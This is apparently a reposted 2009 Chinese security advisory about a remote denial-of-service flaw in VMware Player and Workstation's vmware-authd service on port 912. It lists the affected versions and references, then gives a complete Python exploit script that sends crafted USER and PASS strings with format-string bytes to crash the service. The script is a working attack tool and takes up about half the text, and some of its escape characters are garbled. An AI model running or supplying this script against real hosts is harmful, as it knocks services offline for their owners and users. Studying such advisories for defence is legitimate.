VMware Player和Workstation 'vmware-authd'远程拒绝服务漏洞
来源:岁月联盟
时间:2009-10-10
VMWare Workstation 6.5.3 build 185404
VMWare Player 2.5.3 build 185404漏洞描述:
Bugraq ID: 36630
VMware Player是一款可以让PC用户在Windows或Linux PC上很容易的运行虚拟机的免费软件。VMWare Workstation是一款流行的虚拟机应用程序。
当处理登录请求时VMware授权服务存在错误,通过提交包含 ’/xFF’字符的"USER"或"PASS"字符串给监听在TCP 912端口的"vmware-authd"进程,可导致服务停止响应。
根据报告,确认VMware Workstation 6.5.3 build 185404和VMware Player 2.5.3 build 185404中的vmware-authd.exe 6.5.3.8888版本受此漏洞影响。其他版本也可能受此漏洞影响。<*参考
http://www.shinnai.net/index.php?mod=02_Forum&group=02_Bugs_and_Exploits&argument=01_Remote&topic=1254924405.ff.php
http://secunia.com/advisories/36988/
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!# ----------------------------------------------------------------------------
# VMware Authorization Service <= 2.5.3 (vmware-authd.exe) Format String DoS
# url: http://www.vmware.com/
#
# author: shinnai
# mail: shinnai[at]autistici[dot]org
# site: http://www.shinnai.net
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Tested on Windows XP Professional Ita SP3 full patched
# ----------------------------------------------------------------------------
# usage: C:/>exploit.py 127.0.0.1 912
import socket
import time
import sys
host = str(sys.argv[1])
port = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
conn = s.connect((host, port))
d = s.recv(1024)
print "Server <- " + d
s.send(’USER /x25/xFF /r/n’)
print ’Sending command "USER" + evil string...’
d = s.recv(1024)
print "Server response <- " + d
s.send(’PASS /x25/xFF /r/n’)
print ’Sending command "PASS" + evil string...’
try:
d = s.recv(1024)
print "Server response <- " + d
except:
print "/nExploit completed..."
except:
print "Something goes wrong honey..."
SEBUG安全建议:
厂商解决方案:
目前没有详细解决方案提供:
http://www.vmware.com/